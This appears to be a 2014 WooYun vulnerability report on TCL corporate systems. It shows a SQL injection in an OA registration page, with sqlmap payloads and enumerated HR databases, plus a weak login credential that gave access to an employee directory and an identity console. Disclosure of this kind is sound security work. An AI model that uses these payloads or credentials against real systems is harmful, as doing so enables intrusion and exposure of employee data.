当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048000

漏洞标题:TCL某重要系统漏洞大礼包(sql注入、弱口令、信息泄露)

相关厂商:TCL官方网上商城

漏洞作者: Mr.leo

提交时间:2014-01-06 11:16

修复时间:2014-02-20 11:16

公开时间:2014-02-20 11:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-06: 厂商已经确认,细节仅向厂商公开
2014-01-16: 细节向核心白帽子及相关领域专家公开
2014-01-26: 细节向普通白帽子公开
2014-02-05: 细节向实习白帽子公开
2014-02-20: 细节向公众公开

简要描述:

TCL某重要系统漏洞大礼包(sql注入、弱口令、信息泄露)

详细说明:

站点1:
oa.king.tcl.com TCLoa办公系统
使用搜索引擎,搜索关键字,发现该系统出现2个域名

0409.jpg


故再次进行了一次安全测试
WooYun: TCL#某重要办公系统存在漏洞导致SQL注射及信息泄露 属于同一系统,不过域名不同,厂商是不是部署了2套oa系统,忘了统一了?
ip反查也标明2个域名访问的页面相同,不过ip地址不同

126.jpg


240.jpg


http://oa.king.tcl.com/management/Regeist/Region.aspx
此页面的txt_Account参数没有过滤导致注射漏洞
burp抓post包

POST /management/Regeist/Region.aspx HTTP/1.1
Content-Length: 907
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://oa.king.tcl.com/management/Regeist/Region.aspx
Host: oa.king.tcl.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
cmdReturn=%b7%b5%20%bb%d8&cmdSubmit=%c8%b7%b6%a8&DDL_Area=GIC&rSex=rb_male&txtEmail=sample%40email.tst&txtMobile=987-65-4329&txtPassword=g00dPa%24%24w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa%24%24w0rD&txt_Account=123&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK%2bxZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O%2bjDwKs14G9BgL43vDkCgL%2biJimAgKWxZPnCQKFkp%2bkDQKZko%2bnDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP%2bWCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg%3d
sqlmap identified the following injection points with a total of 97 HTTP(s) requests:
---
Place: POST
Parameter: txt_Account
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(97)+CHAR(114)+CHAR(115)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(71)+CHAR(77)+CHAR(100)+CHAR(117)+CHAR(58)+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(58)-- &txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123'; WAITFOR DELAY '0:0:5';--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' WAITFOR DELAY '0:0:5'--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_Account
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(97)+CHAR(114)+CHAR(115)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(71)+CHAR(77)+CHAR(100)+CHAR(117)+CHAR(58)+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(58)-- &txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123'; WAITFOR DELAY '0:0:5';--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cmdReturn=�� ��&cmdSubmit=ȷ��&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' WAITFOR DELAY '0:0:5'--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
---
current user: 'GICHrmDB'
current database: 'Hrm'
available databases [12]:
[*] distribution
[*] ECS
[*] Hrm
[*] Hrm_OEM
[*] HRM_SZ
[*] master
[*] model
[*] msdb
[*] OutStock
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: Hrm
[188 tables]
+------------------------------+
| dbo.AUTHORIZATION_TO_PAYMENT |
| dbo.Budge_right_tree |
| dbo.DevCmds |
| dbo.Devinfo |
| dbo.DinSysAccount |
| dbo.FAPAYMODEL |
| dbo.FAPINGZHENMODEL |
| dbo.FASUBJECT |
| dbo.FaceTmp |
| dbo.Finance_MainIndex |
| dbo.G4_worktimetable |
| dbo.HR_ConBase |
| dbo.HR_DeptToWorkNo |
| dbo.HR_UserGroup |
| dbo.HR_condition |
| dbo.Hr_OutDept |
| dbo.Hr_Position |
| dbo.Hr_Position_Bak |
| dbo.Hr_SelectTemp |
| dbo.Hrm_Freeze |
| dbo.Kq_AllWorkHour |
| dbo.OACITY |
| dbo.OAPROMARY |
| dbo.OASUPPLIERNO |
| dbo.OA_Account |
| dbo.OA_AccountRight |
| dbo.OA_BC_BudgetCost |
| dbo.OA_BC_FreebackMSG |
| dbo.OA_BC_VariableCost |
| dbo.OA_BC_userright |
| dbo.OA_Car_Booking |
| dbo.OA_Car_Driver |
| dbo.OA_Car_Info |
| dbo.OA_CartNO |
| dbo.OA_CompanyTemp |
| dbo.OA_Controlsub |
| dbo.OA_DocuMentList |
| dbo.OA_EmailRemind |
| dbo.OA_EmailRemindtest |
| dbo.OA_Exam_DB |
| dbo.OA_Exam_ExamMain |
| dbo.OA_Exam_Options |
| dbo.OA_FB_Mainmast |
| dbo.OA_FinanceList |
| dbo.OA_FinancePayMent |
| dbo.OA_GICFinancial |
| dbo.OA_Hr_CommunicationBase |
| dbo.OA_Hr_DictDB |
| dbo.OA_Hr_EducationBase |
| dbo.OA_Hr_EmployeeBase |
| dbo.OA_Hr_EmployeeBaseSed |
| dbo.OA_Hr_FamilyBase |
| dbo.OA_Hr_LaborContract |
| dbo.OA_Hr_LanguageBase |
| dbo.OA_Hr_NationalTitles |
| dbo.OA_Hr_WorkExperience |
| dbo.OA_MES_Board |
| dbo.OA_MainDocuMent |
| dbo.OA_MeetingQuitment |
| dbo.OA_MeetingRoom |
| dbo.OA_Meetingarea |
| dbo.OA_MessTrans |
| dbo.OA_MsgTemp |
| dbo.OA_NextDeptCode |
| dbo.OA_Post |
| dbo.OA_PostAccount |
| dbo.OA_ReplacecardRecord |
| dbo.OA_Role |
| dbo.OA_SMS |
| dbo.OA_UserRole |
| dbo.OA_WarehouseAuthorized |
| dbo.OA_base |
| dbo.OA_companydetail |
| dbo.OA_companymast |
| dbo.OA_companymast_bak |
| dbo.OA_deptleadership |
| dbo.OA_fiveSgr |
| dbo.OA_fiveSmsg |
| dbo.OMS_DocMain |
| dbo.OMS_MeetTable |
| dbo.OMS_Members |
| dbo.Oa_BC_Actualcost |
| dbo.Oa_BC_BUSapcodeTable |
| dbo.Oa_BC_BusinessCodeTable |
| dbo.Oa_BC_ChangeCode |
| dbo.Oa_BC_CodeTable |
| dbo.Oa_BC_Costrate |
| dbo.Oa_BC_FXrate |
| dbo.Oa_BC_SapcodeTable |
| dbo.Oa_BC_SubTable |
| dbo.Oa_Dictionary |
| dbo.Oa_Position |
| dbo.Oa_RightMast |
| dbo.Oa_dept |
| dbo.Oms_FileList |
| dbo.Oms_ItemDetail |
| dbo.Oms_ItemLog |
| dbo.Oms_ItemMenPer |
| dbo.Oms_ModelDetail |
| dbo.Oms_ModelMain |
| dbo.ProjectBase |
| dbo.ProjectItem |
| dbo.ProjectLog |
| dbo.SyncTemp |
| dbo.Sys_PrgMast |
| dbo.System_Menu |
| dbo.System_PrgMast |
| dbo.System_Update |
| dbo.System_UserMast |
| dbo.Table_1 |
| dbo.Tmp_10 |
| dbo.Tmp_9 |
| dbo.Tmp_90 |
| dbo.UserInfo |
| dbo.WF_Delegate |
| dbo.WF_ModelDetail |
| dbo.WF_ModelMast |
| dbo.[��ѯ] |
| dbo.att_record |
| dbo.budget_upload_excel |
| dbo.deptMesTOHrm |
| dbo.dtproperties |
| dbo.fix_category |
| dbo.fix_dictdb |
| dbo.fix_fixedmast |
| dbo.fix_mark |
| dbo.fix_mess |
| dbo.fix_news |
| dbo.fix_orders |
| dbo.fix_sorts |
| dbo.hr_AddrSFZ |
| dbo.hr_RzEmailInfo |
| dbo.hr_base |
| dbo.hr_class |
| dbo.hr_department |
| dbo.hr_dept |
| dbo.hr_deptcopy |
| dbo.hr_emp_titles |
| dbo.hr_employee |
| dbo.hr_employeeBF |
| dbo.hr_employeeForSAP319 |
| dbo.hr_employee_lz |
| dbo.hr_employee_rz |
| dbo.hr_employee_tp |
| dbo.hr_employee_tpback |
| dbo.kq_DoorRecord |
| dbo.kq_LZDate |
| dbo.kq_Machines |
| dbo.kq_SpeOverTimeR |
| dbo.kq_SpeWorkRecord |
| dbo.kq_auto_Machines |
| dbo.kq_base |
| dbo.kq_cardlist |
| dbo.kq_finger |
| dbo.kq_holiday |
| dbo.kq_leave |
| dbo.kq_leaveDay |
| dbo.kq_leave_bak |
| dbo.kq_leave_main |
| dbo.kq_leavemonth |
| dbo.kq_machines_emp |
| dbo.kq_machines_log |
| dbo.kq_monthgs |
| dbo.kq_overtime |
| dbo.kq_overtime_bak |
| dbo.kq_transpose |
| dbo.kq_transpose_bak |
| dbo.kq_workday |
| dbo.kq_workday_bak |
| dbo.kq_workday_checkUp |
| dbo.kq_workmonth |
| dbo.kq_workmonth_lz |
| dbo.kq_workrecord |
| dbo.kq_workrecord_bak |
| dbo.kq_worktimetable |
| dbo.oa_TotalMoney |
| dbo.oa_TotalMoneySAP |
| dbo.oa_TotalMoney_Test |
| dbo.oa_accountbak |
| dbo.oa_totalmoney_Copy |
| dbo.oa_totalmoney_bak |
| dbo.sys_user |
| dbo.sys_userright |
| dbo.sysdiagrams |
| dbo.system_Per |
| dbo.tb_Temp |
| dbo.temptable |
+------------------------------+
数据量还是很大的,截取一部分说明问题
Database: Hrm
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.kq_workrecord_bak | 22712493 |
| dbo.kq_workday_bak | 11426503 |
| dbo.kq_workrecord | 6574826 |
| dbo.kq_transpose_bak | 6475205 |
| dbo.kq_overtime_bak | 4174567 |
| dbo.kq_transpose | 2766671 |
| dbo.OA_companydetail | 1244995 |
| dbo.kq_workday | 995213 |
| dbo.kq_SpeWorkRecord | 791875 |
| dbo.kq_leave | 738136 |
| dbo.kq_overtime | 569546 |
| dbo.kq_leave_bak | 532771 |
| dbo.kq_workmonth | 407692 |
| dbo.OA_companymast | 344432 |
| dbo.kq_SpeOverTimeR | 321922 |
| dbo.OA_ReplacecardRecord | 242114 |
| dbo.hr_deptcopy | 233575 |
| dbo.kq_workday_checkUp | 202105 |
| dbo.Hr_Position_Bak | 169622 |
| dbo.Oa_BC_Actualcost | 155838 |
| dbo.kq_machines_log | 93600 |
| dbo.budget_upload_excel | 93573 |
| dbo.kq_finger | 68149 |
| dbo.OA_FinanceList | 55843 |
| dbo.hr_employee_lz | 38769 |
| dbo.kq_DoorRecord | 37621 |
| dbo.sys_userright | 35108 |
| dbo.kq_leavemonth | 31675 |
| dbo.hr_employee_rz | 27487 |
| dbo.kq_machines_emp | 24929 |
| dbo.OA_Hr_EmployeeBase | 22409 |
| dbo.kq_leaveDay | 18155 |
| dbo.Kq_AllWorkHour | 14382 |
| dbo.Tmp_9 | 13219 |
| dbo.oa_TotalMoney | 13195 |
| dbo.kq_cardlist | 12801 |
| dbo.OA_MeetingRoom | 12118 |
| dbo.Hr_Position | 11497 |
| dbo.hr_employeeBF | 10253 |
| dbo.hr_employee | 9606 |
| dbo.OA_BC_BudgetCost | 9125 |
| dbo.OA_Hr_EmployeeBaseSed | 8550 |
| dbo.Oms_ItemLog | 8432 |
| dbo.oa_totalmoney_bak | 8033 |
| dbo.oa_TotalMoneySAP | 7915 |
| dbo.hr_employeeForSAP319 | 7366 |
| dbo.UserInfo | 7243 |
| dbo.Tmp_90 | 7238 |
| dbo.OMS_Members | 7110 |
| dbo.Oms_ItemMenPer | 6367 |
| dbo.kq_LZDate | 5820 |
| dbo.OA_CompanyTemp | 5518 |
| dbo.WF_ModelDetail | 4871 |
| dbo.FAPAYMODEL | 4735 |
| dbo.FAPINGZHENMODEL | 4684 |
| dbo.OA_Account | 4404 |
| dbo.OA_SMS | 4339 |
| dbo.AUTHORIZATION_TO_PAYMENT | 3665 |
| dbo.hr_AddrSFZ | 3515 |
| dbo.OA_AccountRight | 3446 |
| dbo.Budge_right_tree | 3394 |
| dbo.OA_CartNO | 3156 |


站点2:
http://eip.tcl.com/phones/login.aspx TCL集团通讯录平台
直接访问eip.tcl.com,提示网站建设中

1906.jpg


使用谷歌搜索引擎进行关键字识别

1738.jpg


用户名密码弱口令 lif 111111
登录通讯录平台,1w多员工信息泄露。

2841.jpg


站点3:
http://idm.tcl.com/WebConsole/login/login.jsp TCL统一身份管理系统
依旧使用弱口令lif 111111 可以进入
未深入

2514.jpg


over

漏洞证明:

已经证明

修复方案:

1#统一域名和ip地址的管理
2#过滤参数
3#加强安全培训,杜绝弱口令
4#过年了是不是送点礼物呢
5#高rank

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-01-06 11:25

厂商回复:

感谢您的关注,已转交相关公司确认处理。

最新状态:

暂无